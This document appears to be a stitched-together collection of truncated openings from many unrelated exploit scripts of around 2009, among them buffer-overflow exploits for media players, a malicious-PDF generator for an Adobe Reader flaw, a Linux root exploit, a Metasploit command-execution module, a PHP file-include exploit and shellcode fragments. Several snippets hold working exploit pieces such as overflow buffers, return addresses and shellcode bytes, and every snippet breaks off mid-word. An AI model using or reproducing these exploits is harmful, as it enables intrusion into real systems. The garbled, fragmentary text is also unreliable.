#!/usr/bin/perl # CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3 # Exploite By : d3b4g # my webpage www.d3b4g.info # From tiny islands of maldivies # Tested on Windows XP SP3 # 24.12.2009 # I used Adress from SHELL32.dll.You can ch
# # Author : Ahmed Obied ( ahmed.obied@gmail.com ) # # This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) # in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe # Reader 9.2.0 on Windows XP SP3. The
# Author: DigitALL # Version: 2.6.18-20 # Tested on: Linux System # Greetz To: Zombie KroNicKq and All 1923turk.Biz Members # Code : 2.6.18 2008 Exploit's #304;s Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
##### MSF Exploit for CoreHTTP CGI Enabled Remote Arbitrary Command Execution## CoreHTTP fails to properly sanitize user input before passing it to popen,## allowing anyone with a web browser to run arbitrary commands.## No CVE for this yet.###requi
# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly # sanitize user-supplied input. #An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scri
/################################################ // //Vulnerability: Remote Buffer Overflow Exploit //Impact: Remote Denial of Service Attack //Vulnerable Application: TFTP Daemon Version 1.9 //Tested on Windows XP Service Pack II // //Author: Sock
# # Exploit for Easy RM to MP3 27.3.700 on Windows Xp sp3 # By d3b4g # tested on Windows XP SP3 # version:27.3.700 # Date:22.12.09 # From tiny islands of maldivies # my $file= d3b4g.m3u; my $junk= A x 26071; my $eip = pack('V',0x7C836A08); #jmp esp
############################################################## # Author: ThE g0bL!N # Tested on: xp sp2,sp3 #Grrets: His0k4 Alone :) ############################################################## my $shellcode = x31xc9x83xe9xdexd9xeexd9x74x
#!/usr/bin/perl # Versions affected: 2.18 # Tested on: Windows XP Pro SP2 # Author: data$hack # Usage: expl.pl my $file= exs3.m3u; my $junk= A x 223; my $eip = pack('V',0x7C836940); #jmp esp from kernel my $shellcode = x90 x 10; $shellcode = $shell
############### # Model - Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72 # Software Version - Tested on 2.06T13 (Apr 2007, last version for these routers) # Attacker - Tested from GNU/Linux (Sidux and
#!/usr/bin/perl # Local File Include Exploit # Simple PHP Blog = 0.5.1 # jgaliana at isecauditors=dot=com # Internet Security Auditors use LWP::UserAgent; if ($#ARGV 3) { die(Usage: $0 site path file cookie); } $ua = LWP::UserAgent-new; $ua-agent(Si
; Author: sinn3r ; Tested on Windows XP SP3 ; Description: ; This shellcode will attempt to delete the Zone.Identifier ADS (it's a ; trick Microsoft uses to warn you about an exe when you try to run it), ; and then run the file using the ShellExecut
#!/usr/bin/python # Vulnerability: PlayMeNow Malformed M3U Playlist WinXP Universal BoF # Product:PlayMeNow - media player. # Versions affected: Tested with 7.3 and 7.4 # Tested on: Windows XP Pro SP2/3 Home SP3 # Author: loneferret # Original Autho